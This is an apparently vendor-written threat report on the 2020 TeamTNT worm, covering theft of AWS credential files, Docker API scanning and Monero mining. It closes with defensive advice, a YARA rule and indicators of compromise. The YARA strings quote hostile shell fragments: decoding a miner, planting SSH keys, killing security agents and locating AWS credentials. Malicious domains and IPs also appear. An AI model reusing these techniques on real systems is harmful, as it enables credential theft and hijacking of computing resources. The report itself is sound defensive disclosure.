Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials

August 17, 2020

Over the weekend we’ve seen a crypto-mining worm spread that steals AWS credentials. It’s the first worm we’ve seen that contains such AWS specific functionality. The worm also steals local credentials, and scans the internet for misconfigured Docker platforms. We have seen the attackers, who call themselves “TeamTNT”, compromise a number of Docker and Kubernetes systems.

These attacks are indicative of a wider trend. As organisations migrate their computing resources to cloud and container environments, we are seeing attackers following them there.

Figure 1: The message the TeamTNT worm prints to the screen when first run.

AWS Credential Theft

The AWS CLI stores credentials in an unencrypted file at ~/.aws/credentials, and additional configuration details in a file at ~/.aws/config.

The code to steal AWS credentials is relatively straightforward – on execution it uploads the default AWS .credentials and .config files to the attackers server, sayhi.bplace[.]net:

Figure 2: Code to steal AWS credentials from compromised systems.

Curl is used to send the AWS credentials to TeamTNT’s server, which responds with the message “THX”:

Figure 3: The network traffic generated by stolen AWS credentials.

We sent credentials created by CanaryTokens.org to TeamTNT, however have not seen them in use yet. This indicates that TeamTNT either manually assess and use the credentials, or any automation they may have created isn’t currently functioning.

Proliferation

Most crypto-mining worms are an amalgamation of previous worms as authors copy and paste their competitors code. TeamTNT’s worm contains code copied from another worm named Kinsing, which is designed to stop the Alibaba Cloud Security tools:

Figure 4: Repurposed code to stop the Alibaba Cloud Security tools.

In turn, it is likely we will see other worms start to copy the ability to steal AWS Credentials files too.

Docker

The worm also includes code to scan for open Docker API’s using masscan, then spin up docker images and install itself:

Figure 5: Code to scan for open Docker APIs, then install the worm in a new container.

Post Exploitation

The worm deploys the XMRig mining tool to mine monero crypto-currency and generate cash for the attackers. One of the Mining pools they use provides detailed information about the systems the worm has compromised:

Figure 6: The statistics for the Monero wallet (below) on the Monero Ocean mining pool.

This page lists 119 compromised systems, some of which can be identified as Kubernetes Clusters and Jenkins Build Servers.

So far we have seen two different Monero wallets associated with these latest attacks, which have earned TeamTNT about 3 XMR. That equates to only about $300 USD, however this is only one of their many campaigns.

The worm also deploys a number of openly available malware and offensive security tools:

TeamTNT

The worm contains numerous references to “TeamTNT” and the domain teamtnt[.]red. The domain hosts malware, and the homepage titled “TeamTNT RedTeamPentesting” is an odd reference to public malware sandboxes:

Figure 7: The home page for teamtnt[.]red.

Conclusion

Whilst these attacks aren’t particularly sophisticated, the numerous groups out there deploying crypto-jacking worms are successful at infecting large amounts of business systems.

Below are some suggestions to help protect them:

  • Identify which systems are storing AWS credential files and delete them if they aren’t needed. It’s common to find development credentials have accidentally been left on production systems.
  • Use firewall rules to limit any access to Docker APIs. We strongly recommend using a whitelisted approach for your firewall ruleset.
  • Review network traffic for any connections to mining pools, or using the Stratum mining protocol.
  • Review any connections sending the AWS Credentials file over HTTP.

Previous Work

We would like to credit the previous research on TeamTNT by Trend Micro, Malware Hunter Team and r3dbU7z.

Detection

Yara Rule

rule TeamTNT_Worm_August_2020 {

   meta:

      description = “Detects TeamTNT Worm”

      author = “[email protected]”

      date = “2020-08-16”

      license = “Apache License 2.0”

      hash1 = “3a377e5baf2c7095db1d7577339e4eb847ded2bfec1c176251e8b8b0b76d393f”

      hash2 = “929c3017e6391b92b2fbce654cf7f8b0d3d222f96b5b20385059b584975a298b”

      hash3 = “705a22f0266c382c846ee37b8cd544db1ff19980b8a627a4a4f01c1161a71cb0”

   strings:

      $a = “echo $LOCKFILE | base64 -d > $tmpxmrigfile” wide ascii

      $b = “/root/.tmp/xmrig –config=/root/.tmp/” wide ascii

      $c = “if [ -s /usr/bin/curl ]; then” wide ascii

      $d = “echo ‘found: /root/.aws/credentials'” wide ascii

      $e = “function KILLMININGSERVICES(){” wide ascii

      $f = “[email protected]” wide ascii

      $g = “touch /root/.ssh/authorized_keys 2>/dev/null 1>/dev/null” wide ascii

      $h = “rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service” wide ascii

      $i = “[email protected]/root/.ssh/id_ed25519.pub” wide ascii

   condition:

      filesize < 100KB and 1 of them

}

Monero Wallets

88ZrgnVZ687Wg8ipWyapjCVRWL8yFMRaBDrxtiPSwAQrNz5ZJBRozBSJrCYffurn1Qg7Jn7WpRQSAA3C8aidaeadAn4xi4k

85X7JcgPpwQdZXaK2TKJb8baQAXc3zBsnW7JuY7MLi9VYSamf4bFwa7SEAK9Hgp2P53npV19w1zuaK5bft5m2NN71CmNLoh

Domain Names

6z5yegpuwg2j4len.tor2web[.]su

dockerupdate.anondns[.]net

teamtntisback.anondns[.]net

sayhi.bplaced[.]net

teamtnt[.]red

healthymiami[.]com (Compromised)

rhuancarlos.inforgeneses.inf[.]br (Compromised)

IP Addresses

129.211.98[.]236

85.214.149[.]236

203.195.214[.]104

File-Hashes

3a377e5baf2c7095db1d7577339e4eb847ded2bfec1c176251e8b8b0b76d393f
929c3017e6391b92b2fbce654cf7f8b0d3d222f96b5b20385059b584975a298b
705a22f0266c382c846ee37b8cd544db1ff19980b8a627a4a4f01c1161a71cb0

Leave a Reply

Your email address will not be published. Required fields are marked *